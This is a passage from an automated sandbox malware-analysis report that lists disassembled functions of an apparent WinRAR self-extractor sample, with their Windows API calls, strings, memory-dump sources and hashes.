                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00E4A675
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E4A683
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00E4A691
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1035833867-0
                                                                                                                    • Opcode ID: 9a856235890cc70e673161150cf4c250b46999543a2f0b40b5505da25dccab3b
                                                                                                                    • Instruction ID: 22780b17601dfecce881b8a161892083e713ef0eadc9a13ff41979be796b70f3
                                                                                                                    • Opcode Fuzzy Hash: 9a856235890cc70e673161150cf4c250b46999543a2f0b40b5505da25dccab3b
                                                                                                                    • Instruction Fuzzy Hash: B1E01D35982721BFD3615B727D0DB8B3E54AB15B52F050113F605B51D0EB7449488B91
                                                                                                                    Function 00E4D06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcschr
                                                                                                                    • String ID: .lnk$d
                                                                                                                    • API String ID: 2691759472-761835416
                                                                                                                    • Opcode ID: febcaa32e4bbe7e9de61911e6c9db71c1375546d0d04c616901156cd822f8cd4
                                                                                                                    • Instruction ID: 8bbe3f1e6e8306ccf952454eeee2cb8ba5aa5b0d4d646c9719109299d9afc8ad
                                                                                                                    • Opcode Fuzzy Hash: febcaa32e4bbe7e9de61911e6c9db71c1375546d0d04c616901156cd822f8cd4
                                                                                                                    • Instruction Fuzzy Hash: 3AA171729042299ADF24DBA0ED45EFA73FCAF44304F08A5A6F509F3151EE749B84CB61
                                                                                                                    Function 00E375DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00E375E3
                                                                                                                      • Part of subcall function 00E405DA: _wcslen.LIBCMT ref: 00E405E0
                                                                                                                      • Part of subcall function 00E3A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00E3A598
                                                                                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E3777F
                                                                                                                      • Part of subcall function 00E3A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00E3A325,?,?,?,00E3A175,?,00000001,00000000,?,?), ref: 00E3A501
                                                                                                                      • Part of subcall function 00E3A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00E3A325,?,?,?,00E3A175,?,00000001,00000000,?,?), ref: 00E3A532
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                                    • String ID: :
                                                                                                                    • API String ID: 3226429890-336475711
                                                                                                                    • Opcode ID: ff2500d2251c296503cf4625827d50f0b9a53d6591e7ef56bc2c621de9847343
                                                                                                                    • Instruction ID: 9f95dceaf1a23289dd0bb2e29b5c1464f3169fef357b52cb1f25de5d26d686a0
                                                                                                                    • Opcode Fuzzy Hash: ff2500d2251c296503cf4625827d50f0b9a53d6591e7ef56bc2c621de9847343
                                                                                                                    • Instruction Fuzzy Hash: B04152B1801158A9EB35EB64DC5EEEEBBB8AF41300F0050E6B645B2092DB745F89CF70
                                                                                                                    Function 00E3B37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcschr
                                                                                                                    • String ID: *
                                                                                                                    • API String ID: 2691759472-163128923
                                                                                                                    • Opcode ID: c81482274c4dbe53e5d36c3c7a203be07f83adb563e3e8b9e0b0dffbf194872c
                                                                                                                    • Instruction ID: 82b49f2c1f7b179a8bc8acde7fa072f91999e143bea31bf8a90ede0c66478287
                                                                                                                    • Opcode Fuzzy Hash: c81482274c4dbe53e5d36c3c7a203be07f83adb563e3e8b9e0b0dffbf194872c
                                                                                                                    • Instruction Fuzzy Hash: E2316832544311AA8B30EE10990E67B7BE4DF90B18F14A01EFBA7B3043F7628D41D326
                                                                                                                    Function 00E4B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: }
                                                                                                                    • API String ID: 176396367-4239843852
                                                                                                                    • Opcode ID: 755c5b04633cb2d3d21edb24b4931b4d5ebaa53f5ee4e512fe9adcc5ec2ad056
                                                                                                                    • Instruction ID: 9a2e18648f3c53c1482556f1ac461310d162128a92deda786de147d8e1f3fc7c
                                                                                                                    • Opcode Fuzzy Hash: 755c5b04633cb2d3d21edb24b4931b4d5ebaa53f5ee4e512fe9adcc5ec2ad056
                                                                                                                    • Instruction Fuzzy Hash: 102105729043065AD731EEB4F845E6BF3EDDF90758F00282AF940E3141EB68ED4883A2
                                                                                                                    Function 00E3F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E3F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00E3F2E4
                                                                                                                      • Part of subcall function 00E3F2C5: GetProcAddress.KERNEL32(00E781C8,CryptUnprotectMemory), ref: 00E3F2F4
                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,00E3F33E), ref: 00E3F3D2
                                                                                                                    Strings
                                                                                                                    • CryptProtectMemory failed, xrefs: 00E3F389
                                                                                                                    • CryptUnprotectMemory failed, xrefs: 00E3F3CA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$CurrentProcess
                                                                                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                    • API String ID: 2190909847-396321323
                                                                                                                    • Opcode ID: a5fa1ec069726148a14f18c373ba7c5b59ec008a79d779f3d44ef7b71da66100
                                                                                                                    • Instruction ID: cf0937979154321a858b015e4f6976f9465c504f52f3ac1ab3419a6a65057c01
                                                                                                                    • Opcode Fuzzy Hash: a5fa1ec069726148a14f18c373ba7c5b59ec008a79d779f3d44ef7b71da66100
                                                                                                                    • Instruction Fuzzy Hash: 2E113331E01228AFDF11AB31EC4EA6E3F94EF00764F00A126FC457B261CA749D45C690
                                                                                                                    Function 00E4101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateThread.KERNEL32(00000000,00010000,00E41160,?,00000000,00000000), ref: 00E41043
                                                                                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 00E4108A
                                                                                                                      • Part of subcall function 00E36C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E36C54
                                                                                                                      • Part of subcall function 00E36DCB: _wcschr.LIBVCRUNTIME ref: 00E36E0A
                                                                                                                      • Part of subcall function 00E36DCB: _wcschr.LIBVCRUNTIME ref: 00E36E19
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                                                                                    • String ID: CreateThread failed
                                                                                                                    • API String ID: 2706921342-3849766595
                                                                                                                    • Opcode ID: f76db95ad75faeeca9dceb22ce2df6f650cbc4927918c8ae927295c2ac7efbfc
                                                                                                                    • Instruction ID: b5ee98baea701050b29e9d53ca8fdf2d51408759867e10bf630c232e1446a09c
                                                                                                                    • Opcode Fuzzy Hash: f76db95ad75faeeca9dceb22ce2df6f650cbc4927918c8ae927295c2ac7efbfc
                                                                                                                    • Instruction Fuzzy Hash: 7401FEB53443097FD730AF74BC56B76B798EB40751F20606DF54672280CAE16CC88624
                                                                                                                    Function 00E3C058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcschr
                                                                                                                    • String ID: <9$?*<>|"
                                                                                                                    • API String ID: 2691759472-2723886458
                                                                                                                    • Opcode ID: 6e2646f6dd82e79a7097df198eae23ccd6ae727951415dd2fa98aefadbdfaff1
                                                                                                                    • Instruction ID: daadc4c703071d2528576d69ea48b59bdbc4beddfe0fe51976749246379a34d5
                                                                                                                    • Opcode Fuzzy Hash: 6e2646f6dd82e79a7097df198eae23ccd6ae727951415dd2fa98aefadbdfaff1
                                                                                                                    • Instruction Fuzzy Hash: 75F0D617944381C1C7381A286815732B7E4DF91324F34281EE5C4B71D2E5A1C8C0CB55
                                                                                                                    Function 00E4DB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: Software\WinRAR SFX$
                                                                                                                    • API String ID: 176396367-3959033184
                                                                                                                    • Opcode ID: 65d801ccd3802994aa7859b0da4c706bb3d35b1120ba7200af4f7e6670bd8f66
                                                                                                                    • Instruction ID: baac163849a6668a7c2068b5d492fab4c71b8746df54ba26dd07adb4e8935430
                                                                                                                    • Opcode Fuzzy Hash: 65d801ccd3802994aa7859b0da4c706bb3d35b1120ba7200af4f7e6670bd8f66
                                                                                                                    • Instruction Fuzzy Hash: 43018471500218BEDB219BA1EC0AFDF7FBCEB45794F004052B509B1061D7B14A88C7A1
                                                                                                                    Function 00E4AE2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E3C29A: _wcslen.LIBCMT ref: 00E3C2A2
                                                                                                                      • Part of subcall function 00E41FDD: _wcslen.LIBCMT ref: 00E41FE5
                                                                                                                      • Part of subcall function 00E41FDD: _wcslen.LIBCMT ref: 00E41FF6
                                                                                                                      • Part of subcall function 00E41FDD: _wcslen.LIBCMT ref: 00E42006
                                                                                                                      • Part of subcall function 00E41FDD: _wcslen.LIBCMT ref: 00E42014
                                                                                                                      • Part of subcall function 00E41FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00E3B371,?,?,00000000,?,?,?), ref: 00E4202F
                                                                                                                      • Part of subcall function 00E4AC04: SetCurrentDirectoryW.KERNELBASE(?,00E4AE72,C:\Users\user\Desktop,00000000,00E7946A,00000006), ref: 00E4AC08
                                                                                                                    • _wcslen.LIBCMT ref: 00E4AE8B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CompareCurrentDirectoryString
                                                                                                                    • String ID: <$C:\Users\user\Desktop
                                                                                                                    • API String ID: 521417927-1688363908
                                                                                                                    • Opcode ID: 95728644c60b733c0310e3b3f75d9b79fbf218e9cda10a40e44df59210b85f50
                                                                                                                    • Instruction ID: 4c8b86cb5aade2229dd72843c32f1750afc1b94a5a65b832ea1c2ee69ba047a2
                                                                                                                    • Opcode Fuzzy Hash: 95728644c60b733c0310e3b3f75d9b79fbf218e9cda10a40e44df59210b85f50
                                                                                                                    • Instruction Fuzzy Hash: 91017571D4021899DF10ABA4ED4ADDF73FCAF08704F041466F616F3192E6B4A6888BA1
                                                                                                                    Function 00E5BB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E597E5: GetLastError.KERNEL32(?,00E71030,00E54674,00E71030,?,?,00E53F73,00000050,?,00E71030,00000200), ref: 00E597E9
                                                                                                                      • Part of subcall function 00E597E5: _free.LIBCMT ref: 00E5981C
                                                                                                                      • Part of subcall function 00E597E5: SetLastError.KERNEL32(00000000,?,00E71030,00000200), ref: 00E5985D
                                                                                                                      • Part of subcall function 00E597E5: _abort.LIBCMT ref: 00E59863
                                                                                                                    • _abort.LIBCMT ref: 00E5BB80
                                                                                                                    • _free.LIBCMT ref: 00E5BBB4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast_abort_free
                                                                                                                    • String ID: p
                                                                                                                    • API String ID: 289325740-2678736219
                                                                                                                    • Opcode ID: 5562ea3493d4f28d60c4b7b39dd246318d02ea71b09e0657310a7ad5c9374db7
                                                                                                                    • Instruction ID: 70f079af9fd9037554092ec565b422f53d8058afb46d4f31f9b70007a4a749e2
                                                                                                                    • Opcode Fuzzy Hash: 5562ea3493d4f28d60c4b7b39dd246318d02ea71b09e0657310a7ad5c9374db7
                                                                                                                    • Instruction Fuzzy Hash: 8701C475D00621DFCB61AF69A40126EB7F0BF04B26B15290AED2477291DBB56D098FC1
                                                                                                                    Function 00E4B425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Malloc
                                                                                                                    • String ID: ($Z
                                                                                                                    • API String ID: 2696272793-3316338816
                                                                                                                    • Opcode ID: 5d66b47422e09ff9e948c70e29f5ec0fb77d63a4eee190057fe6f570081cce4e
                                                                                                                    • Instruction ID: 128e945323a7b9d09e251fd75cd423757d810f5d5a6d1132235abe2408c4f763
                                                                                                                    • Opcode Fuzzy Hash: 5d66b47422e09ff9e948c70e29f5ec0fb77d63a4eee190057fe6f570081cce4e
                                                                                                                    • Instruction Fuzzy Hash: A301F6B6640119FF9F059FB1ED49CEEBBADEF08344710415AB906E7120E671AA48DBA0
                                                                                                                    Function 00E58268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E5BF30: GetEnvironmentStringsW.KERNEL32 ref: 00E5BF39
                                                                                                                      • Part of subcall function 00E5BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E5BF5C
                                                                                                                      • Part of subcall function 00E5BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E5BF82
                                                                                                                      • Part of subcall function 00E5BF30: _free.LIBCMT ref: 00E5BF95
                                                                                                                      • Part of subcall function 00E5BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E5BFA4
                                                                                                                    • _free.LIBCMT ref: 00E582AE
                                                                                                                    • _free.LIBCMT ref: 00E582B5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                    • String ID: 0"
                                                                                                                    • API String ID: 400815659-420201205
                                                                                                                    • Opcode ID: a0ceee81e26260402f03d6f36c06aaf3129281ef4098e1cd0adef63430af7e07
                                                                                                                    • Instruction ID: bb63c2bda3117249233be4881020035ddb5514654d77d5ebc02ed5285e6e5197
                                                                                                                    • Opcode Fuzzy Hash: a0ceee81e26260402f03d6f36c06aaf3129281ef4098e1cd0adef63430af7e07
                                                                                                                    • Instruction Fuzzy Hash: 34E0E537706942559A61337A2D0266F1A844BC133BF143E1AFF10B60E3CE50880E49A2
                                                                                                                    Function 00E40FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00E41206,?), ref: 00E40FEA
                                                                                                                    • GetLastError.KERNEL32(?), ref: 00E40FF6
                                                                                                                      • Part of subcall function 00E36C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E36C54
                                                                                                                    Strings
                                                                                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00E40FFF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
